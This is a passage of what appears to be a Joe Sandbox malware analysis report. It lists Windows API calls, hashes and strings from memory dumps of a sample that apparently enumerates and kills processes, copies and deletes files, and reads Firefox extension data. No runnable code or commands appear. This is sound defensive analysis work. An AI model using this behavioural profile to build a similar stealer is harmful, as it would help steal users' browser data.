                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                            • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                            • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                            • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,023E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 023F8DED
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023EDA68
                                            • lstrlen.KERNEL32(00000000), ref: 023EDC06
                                            • lstrlen.KERNEL32(00000000), ref: 023EDC1A
                                            • DeleteFileA.KERNEL32(00000000), ref: 023EDC99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                            • Instruction ID: 47550437cc259ef4e1be231c3d5188dfb99bb43095da0b75c8f00f365b2190ba
                                            • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                            • Instruction Fuzzy Hash: 6981E6729502189BCF68FBA4ED64DEE733AAF54300F50456DE60AA6190EF346B4CCF61
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00799AC8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                            • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                            • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                            • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                            • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                            • API String ID: 998311485-3310892237
                                            • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                            • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                            • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                            • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                            APIs
                                            • memset.MSVCRT ref: 023F9752
                                              • Part of subcall function 023F8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,023F9785,00000000), ref: 023F8FC2
                                              • Part of subcall function 023F8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 023F8FC9
                                              • Part of subcall function 023F8FB7: wsprintfW.USER32 ref: 023F8FDF
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 023F9812
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 023F9830
                                            • CloseHandle.KERNEL32(00000000), ref: 023F983D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 3729781310-0
                                            • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                            • Instruction ID: 9482b4ae95db5e281c0651c7eda416f5438ca1a336aeb56e8f612babaacf649e
                                            • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                            • Instruction Fuzzy Hash: 3A312875E00348EFDB54DFE4DC48BEDB779EB48300F104459E60AAA284DB74AA88CF51
                                            APIs
                                            • memset.MSVCRT ref: 004194EB
                                              • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                              • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                              • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                            • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 396451647-0
                                            • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                            • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                            • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                            • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 023F8931
                                            • Process32First.KERNEL32(?,00000128), ref: 023F8945
                                            • Process32Next.KERNEL32(?,00000128), ref: 023F895A
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • CloseHandle.KERNEL32(?), ref: 023F89C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                            • Instruction ID: 4fb419e4c5cc8e10b4ae25b6caf75b1f13e0af8e7e139fdd684a8b3d8478b922
                                            • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                            • Instruction Fuzzy Hash: 53318071901218ABCB68DF90ED54FEEB779EF45700F104199E60EA21A0DB346F88CF91
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                            • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                            • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • CloseHandle.KERNEL32(?), ref: 00418761
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                            • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                            • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                            • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                            APIs
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                            • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                            • lstrcatA.KERNEL32(?,0079D630), ref: 00414FAB
                                            • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID:
                                            • API String ID: 2667927680-0
                                            • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                            • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                            • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                            • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                            • wsprintfA.USER32 ref: 00418850
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrcpywsprintf
                                            • String ID: %dx%d
                                            • API String ID: 2716131235-2206825331
                                            • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                            • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                            • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                            • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID:
                                            • API String ID: 3407564107-0
                                            • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                            • Instruction ID: 02988b2fabebd573c46beefba31950af1346d35f69e42848d621727769ff8d7d
                                            • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                            • Instruction Fuzzy Hash: A0112B75900209EFCB44DFE5E958AEDBB79FF04305F108469E90967250E7705B44CF65
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 023F7C17
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F7C1E
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 023F7C2B
                                            • wsprintfA.USER32 ref: 023F7C5A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 377395780-0
                                            • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                            • Instruction ID: 0159531a472a886e186e406e7a2a9dd7d773b6c6ff99542a4581829aa3575cb8
                                            • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                            • Instruction Fuzzy Hash: 521139B2944118ABCB14DFC9ED45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                            • wsprintfA.USER32 ref: 004179F3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 1243822799-0
                                            • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                            • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                            • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                            • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 023F7CCA
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F7CD1
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 023F7CE4
                                            • wsprintfA.USER32 ref: 023F7D1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 3317088062-0
                                            • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                            • Instruction ID: dd53e5dcffe57804eebf4d740341b22e373195bdd30320bca043844ee66b2d76
                                            • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                            • Instruction Fuzzy Hash: 32113CB1A45218EBEB208F54EC49FA9B7B8FB05721F10439AF61AA32D0C77459408B51
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s
                                            • String ID:
                                            • API String ID: 3330995566-0
                                            • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                            • Instruction ID: 60c81271e70129a9d3e3093b431ffb57efe6502db60d9b32a4cb37dee3ab8234
                                            • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                            • Instruction Fuzzy Hash: 751127B4E00209EFDB54CFE6E988BEEBBB9FB08705F10C029E525A6250D7789505CF55
                                            APIs
                                            • CreateFileA.KERNEL32(023F3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,023F3D55,?), ref: 023F9563
                                            • GetFileSizeEx.KERNEL32(000000FF,023F3D55), ref: 023F9580
                                            • CloseHandle.KERNEL32(000000FF), ref: 023F958E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID:
                                            • API String ID: 1378416451-0
                                            • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                            • Instruction ID: 85b2b605f8392622e46b21797efefc7ea9508f50e2d4ebb6d72d191ce63c5841
                                            • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                            • Instruction Fuzzy Hash: BFF04F39E40208BBDB60DFF0EC49B9E77BAEB49710F10C654FA15A7280D63596018B41
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 023F6D31
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 023F6D4F
                                            • CloseHandle.KERNEL32(00000000), ref: 023F6D60
                                            • Sleep.KERNEL32(00001770), ref: 023F6D6B
                                            • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 023F6D81
                                            • ExitProcess.KERNEL32 ref: 023F6D89
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                            • Instruction ID: 11ca0794c9df5e08ae24cdae502dfbb4138e6441c108c1e6cfa5f90090f3b3e5
                                            • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                            • Instruction Fuzzy Hash: A1F05E7A980205AEE7A0ABE1FC1ABBD767EEB05741F10152AF722A5590CBB04500CE56
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
